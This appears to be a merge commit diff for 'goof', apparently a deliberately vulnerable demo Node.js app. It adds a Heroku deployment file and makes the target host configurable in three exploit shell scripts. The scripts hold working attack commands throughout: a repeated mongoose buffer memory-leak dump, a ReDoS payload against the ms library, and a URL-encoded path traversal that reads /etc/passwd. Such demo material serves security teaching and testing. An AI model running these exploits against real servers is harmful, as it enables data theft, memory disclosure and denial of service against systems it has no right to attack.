Merge pull request #24 from guypod/master

chore: add heroku file, configurable goof host

app.json

@@ -0,0 +1,23 @@
+{
+  "name": "goof",
+  "scripts": {
+  },
+  "env": {
+    "MONGOLAB_URI": {
+      "required": true
+    }
+  },
+  "formation": {
+    "web": {
+      "quantity": 1
+    }
+  },
+  "addons": [
+    "mongolab"
+  ],
+  "buildpacks": [
+    {
+      "url": "heroku/nodejs"
+    }
+  ]
+}

exploits/mongoose-exploits.sh

@@ -1,26 +1,30 @@
 ### Note: these exploits use the httpie command line utility
 
+if [ -z "$GOOF_HOST" ]; then 
+	export GOOF_HOST=http://localhost:3001
+fi
+
 # start
-alias mon1="http http://localhost:3001/ --headers"
+alias mon1="http $GOOF_HOST/ --headers"
 
 # Works as advertised
-alias mon2="echo 'content=Buy Beer' | http --form http://localhost:3001/create -v"
+alias mon2="echo 'content=Buy Beer' | http --form $GOOF_HOST/create -v"
 
 # Works with json
-alias mon3="echo '{\"content\":\"Fix the bike\"}' | http --json http://localhost:3001/create -v"
+alias mon3="echo '{\"content\":\"Fix the bike\"}' | http --json $GOOF_HOST/create -v"
 
 # Works with number string
-alias mon4="echo '{\"content\":\"800\"}' | http --json http://localhost:3001/create -v"
+alias mon4="echo '{\"content\":\"800\"}' | http --json $GOOF_HOST/create -v"
 
 # Exploit start - integer
-alias mon5="echo '{\"content\":800}' | http --json http://localhost:3001/create -v"
+alias mon5="echo '{\"content\":800}' | http --json $GOOF_HOST/create -v"
 
 # Switch to only showing the response body
-alias mon6="echo '{\"content\":800}' | http --json http://localhost:3001/create -b | base64 -D"
+alias mon6="echo '{\"content\":800}' | http --json $GOOF_HOST/create -b | base64 -D"
 
 # Repeatedly extract memory
 # window 1
-alias mon_repeat1="repeat 1000 echo '{\"content\":800}' | http --json http://localhost:3001/create -b | base64 -D >> leakedmem.bin"
+alias mon_repeat1="repeat 1000 echo '{\"content\":800}' | http --json $GOOF_HOST/create -b | base64 -D >> leakedmem.bin"
 
 # window 2 - see strings in the response
 alias mon_repeat2="tail -f leakedmem.bin | strings"

exploits/ms-exploits.sh

@@ -1,8 +1,13 @@
 # Working via curl
-alias ms1="echo 'content=Call mom in 20 minutes' | http --form http://localhost:3001/create -v"
+
+if [ -z "$GOOF_HOST" ]; then
+	export GOOF_HOST=http://localhost:3001
+fi
+
+alias ms1="echo 'content=Call mom in 20 minutes' | http --form $GOOF_HOST/create -v"
 
 # Works with long string that matches
-alias ms2="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutes' | http --form http://localhost:3001/create -v"
+alias ms2="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutes' | http --form $GOOF_HOST/create -v"
 
 # Hangs with long string that doesn't match
-alias ms3="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutea' | http --form http://localhost:3001/create -v"
+alias ms3="echo 'content=Buy milk in '\`printf "%.0s5" {1..60000}\`' minutea' | http --form $GOOF_HOST/create -v"

exploits/st-exploits.sh

@@ -1,14 +1,19 @@
 # Works as advertised
-alias st1="curl http://localhost:3001/public/about.html"
+
+if [ -z "$GOOF_HOST" ]; then
+	export GOOF_HOST=http://localhost:3001
+fi
+
+alias st1="curl $GOOF_HOST/public/about.html"
 
 # Directory listing (not necessary)
-alias st2="curl http://localhost:3001/public/"
+alias st2="curl $GOOF_HOST/public/"
 
 # Failed ../
-alias st3="curl http://localhost:3001/public/../../../"
+alias st3="curl $GOOF_HOST/public/../../../"
 
 # Exploit start
-alias st4="curl http://localhost:3001/public/%2e%2e/%2e%2e/%2e%2e/"
+alias st4="curl $GOOF_HOST/public/%2e%2e/%2e%2e/%2e%2e/"
 
 # Exploit full
-alias st5="curl http://localhost:3001/public/%2e%2e/%2e%2e/%2E%2E/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
+alias st5="curl $GOOF_HOST/public/%2e%2e/%2e%2e/%2E%2E/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"